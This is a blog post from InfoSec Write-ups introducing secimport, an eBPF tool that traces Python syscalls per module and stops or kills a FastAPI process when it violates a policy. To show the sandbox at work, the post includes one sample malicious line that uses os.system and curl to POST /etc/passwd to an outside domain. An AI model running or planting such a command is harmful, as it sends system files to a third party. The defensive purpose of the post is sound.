Secure FastAPI with eBPF

Published in

InfoSec Write-ups

8 min readSep 3, 2023

Leverage eBPF to secure internet-facing APIs: FastAPI, BlackSheep, Flask, Django, aiohttp, Tornado, and more.

In the previous post, I used secimport to secure PyTorch code.
I showed how PyTorch models from insecure sources can be evaluated safely on any Linux machine.

Why Secure APIs?

FastAPI has ~240K lines of code.
➜ fastapi git:(master) git ls-files | xargs wc -l
240562 total

APIs should operate independently of the OS and avoid reliance on the OS memory or file system (in most cases). APIs are designed to be stateless, straightforward, and uncomplicated. They encompass both the Application Interface and database Operations, constantly communicating at scale.

For hackers, APIs are valuable targets due to their permissive, all-in-one nature with significant impact. Handling requests and returning various status codes (indicating success or error) over a TCP application protocol is their primary role.

Vulnerabilities in Dependencies

In 2022, log4shell exposed a critical issue. Log4j, designed for logging purposes, was exploited through an HTTP header parsing bug in most internet-facing Java servers. This bug allowed attackers to open a local LDAP server and execute commands on the target HTTP server. It raises the question: Why should a logging library have the capability to network and execute commands on the host? Such functionalities should only be enabled explicitly, not by default.

The Ease of Malicious Packages

in PyPi In 2023, pypi.org (Python Package Index) had to be temporarily shut down due to an overwhelming number of security incidents that outpaced the moderators’ review process. While we carefully select our dependencies, we should not hesitate to use them. Dependencies should not have the ability to network or run processes without explicit permission. Python code can execute arbitrary code during installation, import, and runtime.

The Dominance of the Interpreter (“Interpreter is king”)

Python’s lack of robust permission management is a concern. Managing each module in your code can be challenging due to shared memory, (sys.modules), threading, and other factors.

While some may argue, I believe that well-defined capabilities make programs more predictable.

Tracing Python syscalls in real-time

In the first blog post (Part 1), I explored various tracing tools.
I already used DTrace for tracing and runtime on Mac and Windows, but I desired an even better solution, Which is Linux only, and uses eBPF.

I incorporated bpftrace to secimport, an eBPF+LLVM-based toolkit. bpftrace was optimal thanks to its fast learning curve and robustness.
What makes bpftrace truly remarkable is its ability to leverage LLVM for compiling high-level user-defined scripts written in the bpftrace language into efficient BPF code. The results are nothing short of impressive!

Secimport

Secimport, powered by eBPF, addresses these concerns by providing a secure sandbox for Python. With secimport, specific system calls can be specified per module in your code, to protect your environment at runtime at very little cost.

Using USDT and kernel probes, secimport traces and secures Python runtime. It empowers developers to regain control over package actions and safeguard their code.

Let’s install secimport on our host (Linux in this case)

$ pip install secimport

The available secimport commands include:

secimport trace: Traces the behavior of a Python program, by running it or by specifying a running process id. The syscalls are logged per module into a file.
secimport trace_pid: Trace a running process by PID.
secimport build: Build a new sandbox environment from a trace.
secimport run: Run a Python process inside a sandbox environment.
secimport interactive: Create a new tailor-made sandbox by recording the behavior of a Python interpreter (interactive). Great for small snippets and evaluation. It actually runssecimport trace, secimport build, secimport run sequentially.

Creating a new secimport sandbox from scratch:

To create a new sandbox environment from scratch, you can use the docker container:

git clone https://github.com/avilum/secimport.git
cd docker
./build.sh # Build the bpftrace docker, to support your existing kernel (Mac is supported as well).
./run.sh   # Starts a new temporary container.

You can start building your sandbox by using secimport interactive:

root@1fa3d6f09989:/workspace# secimport interactive
- A python shell will be opened
- The behavior will be recorded.
OK? (y): y

TRACING: ['/workspace/secimport/profiles/trace.bt', '-c', '/workspace/Python-3.10.0/python', '-o', 'trace.log']
                        Press CTRL+D to stop the trace;
Python 3.10.0 (default, Mar 19 2023, 08:34:46) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import this
>>> exit()


$ secimport build
eBPF SANDBOX:  sandbox.bt


$ secimport run
Python 3.10.0 (default, Mar 19 2023, 08:34:46) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import this
>>> import os
[SECIMPORT VIOLATION]: <stdin> called syscall ioctl at depth 0
[SECIMPORT VIOLATION]: <stdin> called syscall ioctl at depth 0

The STOP and KILL flags

Execution Prevention with — stop_on_violation and — kill_on_violation

If you know what you are doing, and you defined a good enough policy,
I encourage you to use these 2 very useful flags:

root@1bc0531d91d0:/workspace# secimport run  --stop_on_violation
>>> import os
>>> os.system('ps')
[SECURITY PROFILE VIOLATED]: <stdin> called syscall 56 at depth 8022
^^^ STOPPING PROCESS 85918 DUE TO SYSCALL VIOLATION ^^^
PROCESS 85918 STOPPED.

root@ee4bc99bb011:/workspace# secimport run --kill_on_violation
>>> import os
>>> os.system('ps')
[SECURITY PROFILE VIOLATED]: <stdin> called syscall 56 at depth 8022
^^^ KILLING PROCESS 86466 DUE TO SYSCALL VIOLATION ^^^
 KILLED.
 SANDBOX EXITED;

How to Protect APIs from Remote Code Execution?

Let’s try to secure a given code from such scenarios.
I will quickly use FastAPI program as an example (From their quickstart).

from fastapi import FastAPI
import uvicorn


app = FastAPI()

@app.get("/")
async def root():
    return {"message": "Hello World"}

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)

Step 1: Trace your application.

You can use one of the following methods to trace your Python application:

secimport trace will run your application with an eBPF tracing script for syscalls.

secimport trace main.py

secimport trace_pid will trace a running process that started beforehand.

secimport trace_pid 28 
# where 28 is an already-running python process

secimport interactive can trace an interactive shell, for small to medium code snippets (instead of an entrypoint like main.py).

root@0584e98a4b5c:/workspace# secimport interactive

Lets create our first tailor-made sandbox with secimport!
- A python shell will be opened
- The behavior will be recorded.
OK? (y): y
...

High test coverage helps since we can run a test suite and expect the same syscalls if your logic was covered.

You can also log the behavior in production safely using eBPF,
using ‘secimport trace_pid 123’. It attaches to a running process and is able to record all syscalls, per module in the code.

So we have traced our program. Let’s build the sandbox from this trace!

Step 2: Create a YAML/JSON policy from the trace.

We build a bpftrace script, which is translated to an eBPF code of the supervisor process.

secimport build <flags>

Step 3: Run your Python application inside the eBPF sandbox.

 secimport run main.py <flags>

Handle Violations

So we ran main.py with secimport and it works well.
Let’s see what happens if we add the following malicious line:

@app.get("/")
async def root():
+++ import os;os.system("curl -X POST -d "$(cat /etc/passwd)" mydomain.com')
    return {"message": "Hello World"}

By default, secimport will log a violation — because we run a command using “os.system”.

If we want to terminate or stop the application when a violation is detected, secimport can send a signal to the supervised subprocess — SIGSTOP or SIGTERM, just before the syscall is actually executed!

secimport is capable of interfering with the process and block is when it violates the policy you define.

Stop the process upon violation

root@0584e98a4b5c:/workspace# secimport run --entrypoint main.py --stop_on_violation
[WARNING]: This sandbox will send SIGSTOP to the program upon violation.

INFO:     Started server process [93]
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://0.0.0.0:8000 (Press CTRL+C to quit)|

[SECURITY PROFILE VIOLATED]: /workspace/main.py called syscall 56 at depth 174387
^^^ STOPPING PROCESS 2446 DUE TO SYSCALL VIOLATION ^^^
  PROCESS 2446 STOPPED.

As you can see in the logs — by adding the “ — stop_on_violation” flag to “secimport run”, The sandbox stopped the process and it did not send the HTTP response at all:

The page did not load! empty response. That’s what we expected because the policy was violated.

Kill the process upon violation

What if we want to kill the process, instead of stopping it?

root@0584e98a4b5c:/workspace# secimport run --entrypoint main.py --kill_on_violation

[WARNING]: This sandbox will send SIGKILL to the program upon violation.

INFO:     Started server process [100]
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://0.0.0.0:8000 (Press CTRL+C to quit)
[SECURITY PROFILE VIOLATED]: /workspace/main.py called syscall 56 at depth 173398
^^^ KILLING PROCESS 2455 DUE TO SYSCALL VIOLATION ^^^
  KILLED.
 SANDBOX EXITED;

The process was killed, as expected. That’s amazing in my opinion!

How to deal with errors?
I recommend having a grace period, in which all the “errors” are logged instead of actively responding — which is the default behavior.
If you know what you are doing and you covered all the use cases you would like to allow, use the stop_on_violation or kill_on_violation unsafe flags to block attacks, rather than logging them.

Conclusion

Imagine having something public “capabilities.txt” file in every Python repository, defining the syscalls a module can execute.
The current interpreter does not support that of course, but this precise specification would clarify a module’s behavior, leaving no room for ambiguity.

Programmers should have a clear understanding of their code’s actions, including network communication, file system access, sudo privileges, socket binding, process management (fork/spawn), memory operations (mmap, unshare, shm), and more.

Thank you for reading this far.
I hope I encouraged you to secure your current applications with secimport. I can help with that process, just open an issue on GitHub.

Part 1: Sandboxing Python modules in your code
Part 2: Secure PyTorch Models with eBPF
Source Code and Examples: https://github.com/avilum/secimport

By the way, I am doing this in my spare time. I also really love coffee!

Avi is making the internet safer in his spare time

I’m a business-oriented engineer, who loves security and AI, with deep security insights. I like to pwn cloud…

www.buymeacoffee.com

Check out my previous releases:

Securing PyTorch Models with eBPF

This article was not generated by GPT

infosecwriteups.com

How I Discovered Thousands of Open Databases on AWS

My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto…

infosecwriteups.com

POC For Google Phishing In 10 Minutes: ɢoogletranslate.com

Back in 2016, I ran into a post about someone buying ɢoogle.com. It was used for phishing proposes (notice the first…

infosecwriteups.com

Identify Website Users By Client Port Scanning — Using WebAssembly And Go

Websites tend to scan the open ports of their users, from the browser, to identify new/returning users better. Can…

infosecwriteups.com

Facebook Knows What You Eat: Discover The Entire Data Facebook Collects About You, Step By Step.

A story of how I explored https://facebook.com/dyi programmatically.

medium.com

Secure FastAPI with eBPF

Table Of Contents:

Why Secure APIs?

Vulnerabilities in Dependencies

The Ease of Malicious Packages

The Dominance of the Interpreter (“Interpreter is king”)

Tracing Python syscalls in real-time

Secimport

Creating a new secimport sandbox from scratch:

The STOP and KILL flags

How to Protect APIs from Remote Code Execution?

Step 1: Trace your application.

Step 2: Create a YAML/JSON policy from the trace.

Step 3: Run your Python application inside the eBPF sandbox.

Handle Violations

Stop the process upon violation

Kill the process upon violation

Conclusion

Avi is making the internet safer in his spare time

I’m a business-oriented engineer, who loves security and AI, with deep security insights. I like to pwn cloud…

Check out my previous releases:

Securing PyTorch Models with eBPF

This article was not generated by GPT

How I Discovered Thousands of Open Databases on AWS

My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto…

POC For Google Phishing In 10 Minutes: ɢoogletranslate.com

Back in 2016, I ran into a post about someone buying ɢoogle.com. It was used for phishing proposes (notice the first…

Identify Website Users By Client Port Scanning — Using WebAssembly And Go

Websites tend to scan the open ports of their users, from the browser, to identify new/returning users better. Can…

Facebook Knows What You Eat: Discover The Entire Data Facebook Collects About You, Step By Step.

A story of how I explored https://facebook.com/dyi programmatically.

Written by Avi Lumelsky